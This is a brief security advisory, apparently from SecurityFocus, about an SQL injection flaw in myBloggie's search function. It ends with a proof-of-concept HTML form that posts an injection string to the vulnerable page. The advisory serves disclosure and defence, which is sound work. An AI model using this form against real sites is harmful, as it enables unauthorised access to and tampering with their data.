source: http://www.securityfocus.com/bid/15017/info

myBloggie is prone to an SQL injection vulnerability. This is due to a lack of sanitization of user-supplied input before passing it on to SQL queries.

Successful exploitation could result in a compromise of the application, disclosure or modification of data, or may permit an attacker to exploit vulnerabilities in the underlying database implementation. 

<HTML><BODY>
<form
action="http://www.example.com/myBloggie/index.php?mode=search"
method="post" name="search" onsubmit="return
checkForm(this)"><center><input type="text"
name="keyword" size="12" value="'SQLInjection"> <input
type="submit" value="Inject this"></center></form>
</BODY></HTML> 